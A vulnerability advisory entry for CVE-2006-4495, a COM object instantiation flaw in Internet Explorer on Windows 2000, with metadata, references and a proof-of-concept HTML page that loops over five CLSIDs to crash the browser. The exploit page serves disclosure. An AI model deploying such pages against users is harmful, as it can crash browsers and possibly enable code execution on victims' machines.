Microsoft Internet Explorer Denial-of-Service Vulnerability

Vulnerability ID: 1110870
Vulnerability type: Boundary condition error
Published: 2006-08-21
Updated: 2007-06-27
CVE ID: CVE-2006-4495
CNNVD-ID: CNNVD-200608-509
Platform: Windows
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/28420
https://www.securityfocus.com/bid/19636
https://cxsecurity.com/issue/WLB-2006090002
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-509
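|Vulnerability Details
Microsoft Internet Explorer allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code by instantiating certain Windows 2000 ActiveX COM objects, including (1) ciodm.dll, (2) myinfo.dll, (3) msdxm.ocx, and (4) creator.dll.
|Exploit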
source: http://www.securityfocus.com/bid/19636/info

Microsoft Windows 2000 is prone to multiple memory-corruption vulnerabilities that are related to the instantiation of COM objects. These issues may be remotely triggered through Internet Explorer.

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls. This may result in arbitrary code execution, but this has not been confirmed. The affected objects are not likely intended to be instantiated through Internet Explorer.

This BID may be related to the issues discussed in BID 17453 (Microsoft Internet Explorer COM Object Instantiation Code Execution Vulnerability). However, these issues affect a different set of COM objects that were not addressed in previous BIDs.

<!--
// Windows 2000 Multiple COM Object Instantiation Vulnerability
// tested on Windows 2000 SP4 CN
// http://www.xsec.org
// nop (nop#xsec.org)
-->
<html>
<head>
<title>COM-tester</title>
</head>
<body>
<script>
var i = 0;
var clsid = new Array(
    // NO: 1
    // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}
    // Info: Microsoft Index Server Catalog Administration Object
    // ProgID: Microsoft.ISCatAdm.1
    // InprocServer32: C:\WINNT\system32\ciodm.dll
    "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}",

    // NO: 2
    // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9}
    // Info: MyInfo ASP Component
    // ProgID: MSWC.MyInfo.1
    // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll
    "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}",

    // NO: 3
    // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467}
    // Info: RadioServer Class
    // ProgID: Mmedia.RadioServer.1
    // InprocServer32: C:\WINNT\system32\msdxm.ocx
    "{8E71888A-423F-11D2-876E-00A0C9082467}",

    // NO: 4 media player?
    // CLSID: {606EF130-9852-11D3-97C6-0060084856D4}
    // Info: CdCreator Class
    // ProgID: Creator.CdCreator.1
    // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
    "{606EF130-9852-11D3-97C6-0060084856D4}",

    // NO: 5 media player?
    // CLSID: {F849164D-9863-11D3-97C6-0060084856D4}
    // Info: CdDevice Class
    // ProgID: Creator.CdDevice.1
    // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll
    "{F849164D-9863-11D3-97C6-0060084856D4}",

    // END (null terminates the loop below)
    null
);

// Create an <object> element for each CLSID in turn.
while (clsid[i]) {
    var a = document.createElement("object");
    window.status = "Testing Object " + clsid[i] + "...";
    a.setAttribute("classid", "clsid:" + clsid[i]);
    i++;
}
window.status = "failed!";
</script>
</body>
</html>
|Affected Products
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
|References

Source: MISC
Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16
Source: BID
Name: 19636
Link: http://www.securityfocus.com/bid/19636
Source: BUGTRAQ
Name: 20060821 [XSec-06-08]: Windows 2000 Multiple COM Object Instantiation Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443896/100/100/threaded
Source: XF
Name: ie-win2k-com-dos(28512)
Link: http://xforce.iss.net/xforce/xfdb/28512
Source: SREASON
Name: 1474
Link: http://securityreason.com/securityalert/1474